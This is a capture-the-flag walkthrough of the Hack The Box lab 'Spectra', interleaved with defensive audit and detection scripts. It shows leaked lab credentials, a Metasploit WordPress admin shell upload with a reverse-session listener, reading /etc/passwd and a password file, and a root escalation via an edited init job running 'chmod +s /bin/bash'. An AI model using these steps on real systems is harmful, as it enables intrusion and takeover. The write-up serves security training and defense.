Today we are going to accept the boot2root challenge of Spectra, a Hack The Box lab. Through this lab, we are going to check our skills in WordPress exploitation and basic privilege escalation.
Table of Contents

Reconnaissance
· Nmap
Enumeration
· Website enumeration
Exploitation
· WordPress Metasploit
Privilege Escalation
· Abusing sudo rights
Reconnaissance
Let's start our journey.
Start an Nmap scan to learn the open ports and the services running on them.
nmap -A 10.129.223.138
Through the Nmap scan we learn that there are three open ports: port 22 (SSH, OpenSSH 8.1), port 80 (HTTP), and port 3306 (MySQL).
First, we open port 80 in the web browser and get a simple page with two links, Software Issue Tracker and Test.
http://10.129.223.138
Enumeration
Before exploring the links found above, we need to edit the hosts file and add an entry mapping the hostname spectra.htb to the Spectra lab IP address 10.129.223.138.
cat /etc/hosts
Now we will try to explore both links found on port 80. Clicking the Test link gives us "Error establishing a database connection". It seems nothing important.
Looking at the other link, spectra.htb/testing, we find a directory listing of multiple files, as shown in the image below. For further analysis we decide to open the wp-config.php.save file.
wp-config.php.save is a leftover copy of the base configuration file for WordPress. After fetching it with curl we find something interesting in it: the MySQL database credentials, username 'devtest' and password 'devteam01'.
curl http://spectra.htb/testing/wp-config.php.save
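The exposed backup file is the whole foothold here, so a defender wants to find such files before an attacker does. The following is an added example, not part of this write-up: a POSIX shell audit that walks a web root for editor and backup copies of configuration files (.save, .bak, .orig, .old, .swp, trailing ~) and flags those that carry WordPress database defines. The web-root layout and file contents are constructed for the demo.

```shell
#!/bin/sh
# Added audit example, not from the original write-up.
# Finds backup/editor artifacts under a web root that a web server will
# serve as plain text, the way wp-config.php.save was served on this box.

# find_exposed_backups WEBROOT
# Prints one line per artifact: "CREDENTIALS <path>" when the file carries
# WordPress DB_* defines, otherwise "ARTIFACT <path>".
find_exposed_backups() {
    webroot="$1"
    find "$webroot" -type f \( -name '*.save' -o -name '*.bak' -o -name '*.orig' \
        -o -name '*.old' -o -name '*~' -o -name '*.swp' \) 2>/dev/null | sort |
    while IFS= read -r f; do
        if grep -qE "define\([[:space:]]*'DB_(PASSWORD|USER|NAME)'" "$f" 2>/dev/null; then
            printf 'CREDENTIALS %s\n' "$f"
        else
            printf 'ARTIFACT    %s\n' "$f"
        fi
    done
}

# count_exposed_backups WEBROOT -> number of artifacts found
count_exposed_backups() {
    find_exposed_backups "$1" | wc -l | tr -d ' '
}

# demo_webroot: constructed web root mirroring the layout seen on the box
# (a /testing copy with real-looking defines, a live /main config, a stray
# editor backup). Prints the temp directory path.
demo_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/testing" "$d/main"
    cat > "$d/testing/wp-config.php.save" <<'EOF'
<?php
define( 'DB_NAME', 'dev' );
define( 'DB_USER', 'devtest' );
define( 'DB_PASSWORD', 'devteam01' );
EOF
    printf '<?php // live config, not a backup\n' > "$d/main/wp-config.php"
    printf 'x\n' > "$d/main/index.php~"
    printf '%s' "$d"
}

# Stand-alone run against the constructed tree.
demo_root=$(demo_webroot)
find_exposed_backups "$demo_root"
```

Pair the audit with a web-server rule that refuses to serve such names at all (in nginx, a `location ~* \.(save|bak|orig|old|swp)$ { return 404; }` block and a similar one for a trailing `~`), and keep copies of wp-config.php out of the document root in the first place.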
Happily, we try to log in to WordPress, but unfortunately the credentials found above do not work and we get the error "Unknown username. Check again or try your email address".
http://spectra.htb/main/wp-login.php
Looking back, now it's time to explore the first link, Software Issue Tracker, found on port 80.
This takes us to a simple WordPress page with just a sample post by the administrator. From this we learn that we can try the username "Administrator". Again we log in on the wp-login page.
Great!! We successfully log in and are redirected to the administration email verification.
Just click on "This email is correct" and get into it.
Exploitation
After some enumeration, we find that the WordPress version is not up to date. Accordingly, we use the Metasploit module below and set the required options, as we have already obtained the username and password, administrator and devteam01 respectively:
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 10.129.223.138
set targeturi /main
set password devteam01
set lhost 10.10.14.100
exploit
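The module run above is why a defender should alert on plugin uploads. Below is an added detection example, not part of this write-up or of Metasploit: a shell function that scans a combined-format web access log for a POST to wp-admin/update.php?action=upload-plugin and for a later direct request, from the same client, for a PHP file inside wp-content/plugins. That this is the footprint the wp_admin_shell_upload module leaves is my understanding of the module and an assumption here; the log lines are constructed, reusing the lab addresses from this write-up.

```shell
#!/bin/sh
# Added detection example, not from the original write-up.
# Scans a combined-format access log for an authenticated WordPress plugin
# upload followed by a direct hit on a PHP file in the plugin directory
# (assumed to match what wp_admin_shell_upload does).

# detect_plugin_upload LOGFILE
# Prints "ALERT <ip> plugin-upload <path>" for each upload and
# "ALERT <ip> direct-plugin-php <path>" for each later direct PHP request
# from a client that uploaded a plugin earlier in the log.
detect_plugin_upload() {
    awk '
    {
        ip = $1
        method = $6; sub(/^"/, "", method)   # field 6 is "METHOD with a leading quote
        path = $7
        if (method == "POST" && path ~ /\/wp-admin\/update\.php[?]action=upload-plugin/) {
            uploaded[ip] = 1
            print "ALERT " ip " plugin-upload " path
        } else if ((ip in uploaded) && path ~ /\/wp-content\/plugins\/[^\/]+\/[^\/]+\.php$/) {
            print "ALERT " ip " direct-plugin-php " path
        }
    }' "$1"
}

# demo_log: constructed log lines shaped like the lab traffic
# (10.10.14.100 is the attacker box address used in the write-up;
# 10.10.14.5 is an unrelated client that never uploaded anything).
demo_log() {
    cat <<'EOF'
10.10.14.100 - - [15/Feb/2021:10:01:02 +0000] "POST /main/wp-login.php HTTP/1.1" 302 0
10.10.14.100 - - [15/Feb/2021:10:01:03 +0000] "POST /main/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 1043
10.10.14.100 - - [15/Feb/2021:10:01:04 +0000] "GET /main/wp-content/plugins/AbCdEf/XyZ.php HTTP/1.1" 200 0
10.10.14.5 - - [15/Feb/2021:10:02:00 +0000] "GET /main/wp-content/plugins/akismet/akismet.php HTTP/1.1" 404 0
10.10.14.5 - - [15/Feb/2021:10:02:10 +0000] "GET /main/ HTTP/1.1" 200 4120
EOF
}

# Stand-alone run: write the constructed log to a temp file and scan it.
demo_file=$(mktemp)
demo_log > "$demo_file"
detect_plugin_upload "$demo_file"
rm -f "$demo_file"
```

The second rule only fires for a client that has already uploaded a plugin, which keeps ordinary traffic to legitimate plugin paths (the 10.10.14.5 line) quiet; on a site where administrators never install plugins through the dashboard, the first rule alone is worth a page.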
Wow!! We have a meterpreter session. Let's go for the post-exploitation enumeration for the user.txt and root.txt files.
While enumerating, we come across another user named "Katie" besides root and nginx.
cat /etc/passwd
Very soon we find that our current user does not have permission to read user.txt in Katie's home directory.
cd /home/katie
ls
cat user.txt
Let's enumerate further. In the /opt directory we hit a file called "autologin.conf.orig".
cd /opt
ls -la
After reading the autologin.conf.orig file we learn that this config file reads the credentials from a passwd file placed in /etc/autologin.
cat autologin.conf.orig
Going to the path /etc/autologin and enumerating it, we find the password file. Read the password file.
Hurray!!! We get the password: SummerHereWeCome!!
cd /etc/autologin
ls -la
cat passwd
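The autologin passwd file could be read by the web-server user, which is the permission problem that turned a web shell into a user account. As an added example (not from the write-up), here is a shell audit for a directory of credential files: it reports every file that group or others can read, counts them, and can tighten them to 0600. The directory and its contents are constructed; the real path on the box was /etc/autologin.

```shell
#!/bin/sh
# Added audit example, not from the original write-up.
# Checks a directory of secret files for modes that let anyone but the
# owner read them, and offers a remediation that sets them to 0600.

# audit_secret_dir DIR
# Prints "WEAK <mode> <path>" for every regular file under DIR that group
# or others can read, and "OK   <mode> <path>" otherwise.
audit_secret_dir() {
    find "$1" -type f | sort | while IFS= read -r f; do
        mode=$(stat -c '%a' "$f")
        # -perm -g+r / -perm -o+r: group / other read bit is set
        if [ -n "$(find "$f" -maxdepth 0 \( -perm -g+r -o -perm -o+r \))" ]; then
            printf 'WEAK %s %s\n' "$mode" "$f"
        else
            printf 'OK   %s %s\n' "$mode" "$f"
        fi
    done
}

# weak_secret_count DIR -> number of files readable beyond their owner
weak_secret_count() {
    audit_secret_dir "$1" | grep -c '^WEAK' || true
}

# fix_secret_dir DIR: remediation, every file under DIR becomes 0600
fix_secret_dir() {
    find "$1" -type f -exec chmod 0600 {} +
}

# demo_secret_dir: constructed stand-in for /etc/autologin with one
# world-readable password file (as on the box) and one correctly locked
# down file. Prints the temp directory path. Values are placeholders.
demo_secret_dir() {
    d=$(mktemp -d)
    printf 'constructed-password\n' > "$d/passwd"
    chmod 644 "$d/passwd"
    printf 'constructed-token\n' > "$d/token"
    chmod 600 "$d/token"
    printf '%s' "$d"
}

# Stand-alone run: audit, fix, audit again.
demo_dir=$(demo_secret_dir)
audit_secret_dir "$demo_dir"
fix_secret_dir "$demo_dir"
audit_secret_dir "$demo_dir"
```

Tightening the mode is the quick fix; the better one is not to keep an autologin password on disk at all, since any process that can read the file, here the nginx worker, gets the account.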
Privilege Escalation
SSH in as user Katie, as we have the password. Through the id command we learn that there is a developers group; at the same time we check the sudoers permissions and come across that user Katie can run /sbin/initctl as root. Now, exploring the files owned by the developers group, we get the test config files. Then open the test configuration file, which is stored in /etc/init, as shown below.
id
sudo -l
find / -type f -group developers 2>/dev/null -ls
cat /etc/init/test.conf
Edit the test config file and replace the existing content with the following script:
chmod +s /bin/bash
As Katie has root permission to execute initctl, we stop and start the test job through initctl and then execute /bin/bash -p to get root.txt.
Finally, we capture the ROOT flag.
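Two checks a defender would add after this escalation, as an added example that is not part of the write-up: the first lists Upstart job files under an init directory that a non-root group or others can write (a group-writable /etc/init/test.conf together with sudo rights on initctl is exactly the combination used above); the second lists setuid binaries that are not on an allowlist, which catches the setuid /bin/bash left behind by chmod +s. The directory tree and allowlist are constructed; both functions take a root directory so they run against the mock tree here and against / in practice.

```shell
#!/bin/sh
# Added audit example, not from the original write-up.
# (1) Job definitions that non-root users can edit are root code execution
#     for anyone who can also start/stop jobs (sudo initctl).
# (2) An unexpected setuid binary such as /bin/bash is the persistence
#     artifact this escalation leaves behind.

# writable_job_files INITDIR -> *.conf files writable by group or others
writable_job_files() {
    find "$1" -type f -name '*.conf' \( -perm -g+w -o -perm -o+w \) | sort
}

# unexpected_suid ROOT ALLOWLIST_FILE
# Prints every setuid regular file under ROOT (path relative to ROOT)
# that is not listed, one path per line, in ALLOWLIST_FILE.
unexpected_suid() {
    root="$1"; allow="$2"
    find "$root" -type f -perm -4000 2>/dev/null | sort | while IFS= read -r f; do
        rel="${f#"$root"}"
        grep -qxF "$rel" "$allow" || printf '%s\n' "$rel"
    done
}

# demo_tree: constructed mock filesystem with a group-writable test.conf,
# a correctly owned ssh.conf, a setuid bash (the artifact) and a setuid
# sudo (expected, on the allowlist). Prints the tree's root path.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/init" "$d/bin" "$d/usr/bin"
    printf 'exec /bin/true\n' > "$d/etc/init/test.conf"; chmod 664 "$d/etc/init/test.conf"
    printf 'exec /bin/true\n' > "$d/etc/init/ssh.conf";  chmod 644 "$d/etc/init/ssh.conf"
    printf ':\n' > "$d/bin/bash";      chmod 4755 "$d/bin/bash"
    printf ':\n' > "$d/usr/bin/sudo";  chmod 4755 "$d/usr/bin/sudo"
    printf '/usr/bin/sudo\n' > "$d/allow.txt"
    printf '%s' "$d"
}

# Stand-alone run against the constructed tree.
demo_root=$(demo_tree)
echo "writable job files:";  writable_job_files "$demo_root/etc/init"
echo "unexpected setuid:";   unexpected_suid "$demo_root" "$demo_root/allow.txt"
```

On a real host the allowlist is the package-manager-owned set of setuid binaries recorded at build time; the point is that a diff against it, run on a schedule, turns this particular trick from a permanent backdoor into a one-run alert.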